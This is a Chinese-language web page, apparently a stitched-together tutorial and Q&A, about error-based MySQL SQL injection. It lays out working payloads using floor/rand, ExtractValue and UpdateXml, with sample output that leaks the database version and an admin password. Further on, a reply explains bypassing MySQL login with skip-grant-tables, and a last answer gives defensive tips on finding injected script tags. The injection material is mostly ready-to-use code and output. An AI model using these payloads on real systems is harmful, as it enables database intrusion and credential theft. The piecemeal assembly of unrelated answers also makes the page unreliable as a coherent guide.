mysql 3种报错模式注入，mysql3种报注入

mysql 3种报错模式注入，mysql3种报注入

1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by... 


    1、通过floor报错 
    可以通过如下一些利用代码 
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 
 and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 
 举例如下： 
    首先进行正常查询： 
mysql> select * from article where id = 1; 
 +----+-------+---------+ 
 | id | title | content | 
 +----+-------+---------+ 
 | 1 | test | do it | 
 +----+-------+---------+ 
 假如id输入存在注入的话，可以通过如下语句进行报错。 
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 
 ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' 
 可以看到成功爆出了Mysql的版本，如果需要查询其他数据，可以通过修改version()所在位置语句进行查询。 
    例如我们需要查询管理员用户名和密码： 
Method1: 
 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a); 
 ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' 
 Method2: 
 mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2))); 
 ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key' 
请看 (  http://www.yuefengqing.com/ )
 2、ExtractValue 
 测试语句如下 
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
 实际测试过程 
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));-- 
 ERROR 1105 (HY000): XPATH syntax error: '\admin888' 

 3、UpdateXml 
 测试语句 
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) 
 实际测试过程 

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1)); 

 ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$' 

嘿嘿

linux 下 请在 /etc/my.cnf 的 [mysqld] 节下 加入如下 配置：

skip-grant-tables

Windows 下面的话 找到 my.ini 文件 同样的操作

然后重启 mysql 服务

[root@localhost baks]# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.1.22-rc Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>
mysql>
mysql>

Good 你进去啦~

-----

请采纳，先谢啦~
 

mysql数据库被sql注入的话，一般是数据库数据泄漏，或者数据被篡改 删除之类的。如果你确定页面有木马什么的，请检查你网站所在目录的读写权限，特别是写入权限，很可能被非法用户通过 漏洞（网站程序漏洞、数据库漏洞、服务器漏洞）篡改网页，而挂马，要想找到挂马的代码，建议把整个网站代码查找下，主要查找 <script src="..."></script> 或者 <iframe src="..."></iframe> 这种形式。